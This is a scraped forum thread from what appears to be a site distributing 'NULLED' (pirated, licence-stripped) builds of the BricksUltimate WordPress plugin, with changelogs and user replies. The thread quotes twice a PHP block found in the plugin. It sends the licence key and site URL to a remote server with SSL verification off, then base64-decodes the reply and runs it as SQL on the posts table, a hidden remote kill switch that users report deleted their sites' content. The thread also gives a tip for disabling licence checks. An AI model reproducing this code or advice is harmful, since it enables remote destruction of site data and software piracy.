• The default language of any content posted is English.
    Do not create multi-accounts, you will be blocked!
BricksUltimate

NULLED BricksUltimate 1.7.11 NULLED

raz0r 's signature
Reacted by:
  • Like
Reactions: iWao and MgcDGpnz
raz0r 's signature
Reacted by:
  • Like
Reactions: iWao
BEWARE!

It's confirmed that this nulled plugin deletes your database (all posts, post types) after "calling home"! I would advise against using this version.

@raz0r
 
flopas10 's signature
Reacted by:
  • Like
Reactions: user020905 and MarkDragon
raz0r 's signature
Reacted by:
  • Like
Reactions: iWao and MgcDGpnz
flopas10 's signature
Reacted by:
I confirm that after activating the plugin, all data and pages from the site are deleted...
 
Reacted by:
I confirm that after activating the plugin, all data and pages from the site are deleted...
Last version? Delete url in file: bricksultimate\includes\Admin\License.php
Code:
const STORE_URL             = 'https://bricksultimate.com';
to
Code:
const STORE_URL             = '';
 
raz0r 's signature
Ok, found encoded code in file: wp-content\plugins\bricksultimate\includes\RegisterElements.php
PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }

            $license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

            if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

                // Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

                if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }
        }

So i've added new nulled version.
 
raz0r 's signature
Ok, found encoded code in file: wp-content\plugins\bricksultimate\includes\RegisterElements.php
PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }

            $license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

            if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

                // Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

                if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }
        }

So i've added new nulled version.
Thanks!

Though it is a really worrying approach by the plugin developer. And he is saying that he plans to mess with nulled users even more in the next updates. All the while his plugin is licensed as GPL v2, allowing for modification and redistribution….
 
flopas10 's signature
Reacted by:
raz0r 's signature
Reacted by:
  • Like
Reactions: iWao and MgcDGpnz
raz0r 's signature
Reacted by:
  • Like
Reactions: iWao and MgcDGpnz
raz0r updated BricksUltimate with a new update entry:

BricksUltimate 1.5.23 NULLED

= 1.5.23 - 2024-03-26 =

* [Checkout(Beta)] – Improves Shipping Methods and Billing Address Selector elements
* [Checkout(Beta)] – New element Place Order Button
* [Checkout(Beta)] – New element Payment Methods
* Added – French translation files(.po and .mo files)
* Improved – Order Total dynamic data tag. Now you can use it on the Cart and Checkout pages.
* Fixed – JS and CSS issues in the Cart Counter element

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
  • Like
Reactions: iWao and Nikvkon
raz0r updated BricksUltimate with a new update entry:

BricksUltimate 1.6 NULLED

Released 1.6 on 18th April 2024

* New element – Checkout Builder
* [Checkout(RC)] – Order Total Wrapper, Shipping Address Selector and Cart Cost elements
* Bug Fixed – Wishlist and Compare items are not deleting if the WooCommerce plugin is deactivated.
* New element condition – Cookie
* Improved – Billing Address Selector element
* Added – a few new template files(JSON)

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
  • Like
Reactions: Techrad and iWao
raz0r 's signature
Reacted by:
  • Like
Reactions: Techrad and Nikvkon
Thanks!

Though it is a really worrying approach by the plugin developer. And he is saying that he plans to mess with nulled users even more in the next updates. All the while his plugin is licensed as GPL v2, allowing for modification and redistribution….
Not anymore now that raz0r knows. He's just pushed back to revisions.
Hahaha.
Great thread.
 
Reacted by:
raz0r 's signature
Reacted by:
  • Like
Reactions: Techrad
raz0r updated BricksUltimate with a new update entry:

BricksUltimate 1.6.7 NULLED

Released 1.6.7 on 15th May 2024
Tested up to WP 6.5.3, Bricks 1.9.8 and WC 8.9.0


* Fixed – Tabs, Accordion, etc elements are not working inside the Cart Total Wrapper element
* New dynamic tag – Count user posts(compatible with any post types)
* New element condition – Payment Gateway
* Improved – AJAX action script
* Improved – Shipping Methods element
* Improved – Checkout page CSS file
* Improved – Place Order Button element
* Improved – Plugin updater notification API. The MainWP...

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
Top